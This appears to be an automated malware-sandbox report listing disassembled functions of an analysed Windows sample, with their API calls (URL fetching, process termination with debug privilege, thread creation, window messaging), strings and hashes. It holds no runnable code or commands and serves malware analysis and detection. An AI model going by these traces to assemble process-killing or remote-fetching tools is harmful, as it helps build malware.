                                                                                                    • Instruction ID: b8a12fd2a30b6e1d3a935c4df468965b5360d885950c1e0dbedc75600dcb4dc5
                                                                                                    • Opcode Fuzzy Hash: e30cbf51bcede0e6d1a13ed04e19da147c014d7ce2f0d1731da2e2d4e66515cf
                                                                                                    • Instruction Fuzzy Hash: 3A617CB5900308AFDB21DFA4DC85EEE77B8EB09310F504159FA14A72E2C770AA55DF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001ECBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ECBCF
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ECBF7
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ECC27
                                                                                                    • GetLastError.KERNEL32 ref: 001ECC7F
                                                                                                    • SetEvent.KERNEL32(?), ref: 001ECC93
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001ECC9E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    • Opcode ID: f857faef827b01e05fda7614cee1a63becff6baac5d5b0356096ff9b6284bd46
                                                                                                    • Instruction ID: 01e7e665391ff9b7779df2d5980093ba8299cc60b8d23fd5296215123dd44b13
                                                                                                    • Opcode Fuzzy Hash: f857faef827b01e05fda7614cee1a63becff6baac5d5b0356096ff9b6284bd46
                                                                                                    • Instruction Fuzzy Hash: A531AEB1500B44AFD7219FA6DD88AAF7BFCEB59744B20051EF84AD3211DB30D9069BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001B5437,?,?,Bad directive syntax error,0020DCD0,00000000,00000010,?,?), ref: 001DA14B
                                                                                                    • LoadStringW.USER32(00000000,?,001B5437,?), ref: 001DA152
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001DA216
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                    • API String ID: 858772685-4153970271
                                                                                                    • Opcode ID: 8c87eca8e999fcb7f8e8f53782318235927d1e9b472a30c8a2d700e9cc297322
                                                                                                    • Instruction ID: fc1474de6088d11a88dd840754a9f48e5ec6e450e0da9a9120d6c54229373e52
                                                                                                    • Opcode Fuzzy Hash: 8c87eca8e999fcb7f8e8f53782318235927d1e9b472a30c8a2d700e9cc297322
                                                                                                    • Instruction Fuzzy Hash: D421807181431EAFCF11EF90CC4AEEE7B39BF28304F048456F519650A2DB71AA28EB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 001D293B
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 001D2950
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001D29DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    • Opcode ID: 63068f83e8703e2a71c36fa2be17de03ecf18643a655efcf99e9b3bd43b664a8
                                                                                                    • Instruction ID: 7c40ba02ef1f9ee8efd914b9fe46a39f9ea7f3d7cda0ee208f3031dc427ab05c
                                                                                                    • Opcode Fuzzy Hash: 63068f83e8703e2a71c36fa2be17de03ecf18643a655efcf99e9b3bd43b664a8
                                                                                                    • Instruction Fuzzy Hash: 711106BA284316BAFE082264EC1BCE6B7DD8F32728F204113F910F51D2EB7269525954
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001ECAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ECADF
                                                                                                    • GetLastError.KERNEL32 ref: 001ECAF2
                                                                                                    • SetEvent.KERNEL32(?), ref: 001ECB06
                                                                                                      • Part of subcall function 001ECBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ECBCF
                                                                                                      • Part of subcall function 001ECBB0: GetLastError.KERNEL32 ref: 001ECC7F
                                                                                                      • Part of subcall function 001ECBB0: SetEvent.KERNEL32(?), ref: 001ECC93
                                                                                                      • Part of subcall function 001ECBB0: InternetCloseHandle.WININET(00000000), ref: 001ECC9E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    • Opcode ID: 43245cf8fd58672d8f910a692b3bf773fce873fce9f814c08c7e59663c57a0f7
                                                                                                    • Instruction ID: 979adde8270571933a8101de4dd6379677c621a484ee10c14b8987d23da00974
                                                                                                    • Opcode Fuzzy Hash: 43245cf8fd58672d8f910a692b3bf773fce873fce9f814c08c7e59663c57a0f7
                                                                                                    • Instruction Fuzzy Hash: DF318D71601B45AFDB219FB6DD49AABBBF8FF48390B04441DF85683621D730E812DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001D1CD9,?,?,00000000), ref: 001D209C
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20A3
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D1CD9,?,?,00000000), ref: 001D20B8
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,001D1CD9,?,?,00000000), ref: 001D20C0
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20C3
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D1CD9,?,?,00000000), ref: 001D20D3
                                                                                                    • GetCurrentProcess.KERNEL32(001D1CD9,00000000,?,001D1CD9,?,?,00000000), ref: 001D20DB
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001D1CD9,?,?,00000000), ref: 001D20DE
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,001D2104,00000000,00000000,00000000), ref: 001D20F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1957940570-0
                                                                                                    • Opcode ID: 27e9d208d99fa177a48507360bea3335e34dd6d725654d89da7eee5bbaac2844
                                                                                                    • Instruction ID: 0a902dd82f40f06d62de2fd0ea30b46be4fa27033d2816053bd3e7f1ed67d91f
                                                                                                    • Opcode Fuzzy Hash: 27e9d208d99fa177a48507360bea3335e34dd6d725654d89da7eee5bbaac2844
                                                                                                    • Instruction Fuzzy Hash: 1501CDB5241308BFE710AFA5EC4DF6B7BACEB89711F008411FA05DB2A2CA749800CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FAA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001DDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 001DDCC1
                                                                                                      • Part of subcall function 001DDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 001DDCCF
                                                                                                      • Part of subcall function 001DDC9C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 001DDD9C
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FAACC
                                                                                                    • GetLastError.KERNEL32 ref: 001FAADF
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FAB12
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001FABC7
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 001FABD2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001FAC23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 1701285019-2896544425
                                                                                                    • Opcode ID: d033dc14646e153ec692d9eab6563fb1b45f29ad9a687ceb27cf9d565b6716e5
                                                                                                    • Instruction ID: 6fa33aa86b0d9fdabc643c15fed7c192ff99e8339416b011054e38de7a2aec1d
                                                                                                    • Opcode Fuzzy Hash: d033dc14646e153ec692d9eab6563fb1b45f29ad9a687ceb27cf9d565b6716e5
                                                                                                    • Instruction Fuzzy Hash: 9B618F70204602AFD324DF14C498F26BBE5AF54318F58C49CE56A4B7A3CB79ED45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002041E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00204284
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00204299
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002042B3
                                                                                                    • _wcslen.LIBCMT ref: 002042F8
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00204325
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00204353
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: ed4b708a10436fcdfb58853f576b49b34000df5242d64094a02027ca28acde33
                                                                                                    • Instruction ID: 402110361646f61ca37636bc37850b05aa557c634c318015f0723d9b88d6f8da
                                                                                                    • Opcode Fuzzy Hash: ed4b708a10436fcdfb58853f576b49b34000df5242d64094a02027ca28acde33
                                                                                                    • Instruction Fuzzy Hash: 5941C271A10309AFDB21AFA4CC49FEA7BA9FF08350F104126FA54E71D2D77099A0CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DC5D9
                                                                                                    • IsMenu.USER32(00000000), ref: 001DC5F9
                                                                                                    • CreatePopupMenu.USER32 ref: 001DC62F
                                                                                                    • GetMenuItemCount.USER32(00F36198), ref: 001DC680
                                                                                                    • InsertMenuItemW.USER32(00F36198,?,00000001,00000030), ref: 001DC6A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2
                                                                                                    • API String ID: 93392585-3793063076
                                                                                                    • Opcode ID: 2a8a2d4850ab59c78e40b0fcdc438bd809b64fe92dccfe2f15e627297d5f6b97
                                                                                                    • Instruction ID: 4135e5ef107707ed071d55558b96d454347625bae168df9ed549e05374c61e44
                                                                                                    • Opcode Fuzzy Hash: 2a8a2d4850ab59c78e40b0fcdc438bd809b64fe92dccfe2f15e627297d5f6b97
                                                                                                    • Instruction Fuzzy Hash: 9F51D370A01306ABDF20CFA8D988BEEBFF5AF54314F14595AE811973A1E770D940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                    • String ID: 0.0.0.0
                                                                                                    • API String ID: 642191829-3771769585
                                                                                                    • Opcode ID: a8f2f1a7cbcff3d96887467f8086b794b120de6ebf43a0fb3e1a0225363d4a1e
                                                                                                    • Instruction ID: f0d1b567b43b627f59a08cd5c9ce2094c15d37d182e8b7536571defe19450571
                                                                                                    • Opcode Fuzzy Hash: a8f2f1a7cbcff3d96887467f8086b794b120de6ebf43a0fb3e1a0225363d4a1e
                                                                                                    • Instruction Fuzzy Hash: BF110371900215ABDF247BB0AC4EEEE77FCEF24711F11016AF54596192EF70CA829A90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F42A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F42C8
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 001F43D7
                                                                                                    • _wcslen.LIBCMT ref: 001F43E7
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F457C
                                                                                                      • Part of subcall function 001E15B3: VariantInit.OLEAUT32(00000000), ref: 001E15F3
                                                                                                      • Part of subcall function 001E15B3: VariantCopy.OLEAUT32(?,?), ref: 001E15FC
                                                                                                      • Part of subcall function 001E15B3: VariantClear.OLEAUT32(?), ref: 001E1608
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: 714e7387152afaaa03bbfd59c45583927962e91b8302cbba82bfde75f6327831
                                                                                                    • Instruction ID: 71f4a217a07c82681c7ffa2dedc6a253922e4223a603ff40f1a926a88f0cf1a0
                                                                                                    • Opcode Fuzzy Hash: 714e7387152afaaa03bbfd59c45583927962e91b8302cbba82bfde75f6327831
                                                                                                    • Instruction Fuzzy Hash: 749166756083059FC704EF68C48096AB7E5FF98314F14892DF98A9B351DB30ED46CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00202A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 00202AE2
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00202B14
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00202B3C
                                                                                                    • _wcslen.LIBCMT ref: 00202B72
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00202BAC
                                                                                                    • GetSubMenu.USER32(?,?), ref: 00202BBA
                                                                                                      • Part of subcall function 001D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 001D42E6
                                                                                                      • Part of subcall function 001D42CC: GetCurrentThreadId.KERNEL32 ref: 001D42ED
                                                                                                      • Part of subcall function 001D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001D2E43), ref: 001D42F4
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00202C42
                                                                                                      • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 1e1bf567f204240042676c4734875f115e53c510b00106bb31a2c88d114ba3aa
                                                                                                    • Instruction ID: 9e312c2e31c51b160c8b17725a9a2cd0ea5a96a103f46857dd98beb51fa0a544
                                                                                                    • Opcode Fuzzy Hash: 1e1bf567f204240042676c4734875f115e53c510b00106bb31a2c88d114ba3aa
                                                                                                    • Instruction Fuzzy Hash: 3271B435A10315EFCB10EFA4C849AAEB7F5EF58314F11845AE816EB382DB74ED418B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002087FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 00208896
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 002088A2
                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0020897D
                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 002089B0
                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 002089E8
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00208A0A
                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00208A22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 4072528602-0
                                                                                                    • Opcode ID: e0afe05438e4b7d82593679c6965c7330be69f0416a19fefb7d594004486917e
                                                                                                    • Instruction ID: dae39c8804b53df26380ae8afea2ae5acae7ea6b8b6e304ba73b9b6406a30dce
                                                                                                    • Opcode Fuzzy Hash: e0afe05438e4b7d82593679c6965c7330be69f0416a19fefb7d594004486917e
                                                                                                    • Instruction Fuzzy Hash: 9771BC3461030AAFEF219F54C884FBBBBB9EF49310F544459E985973A3CB31A960CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001D80D1
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001D80F7
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001D80FA
                                                                                                    • SysAllocString.OLEAUT32 ref: 001D811B
                                                                                                    • SysFreeString.OLEAUT32 ref: 001D8124
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001D813E
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 001D814C
                                                                                                    Memory Dump Source
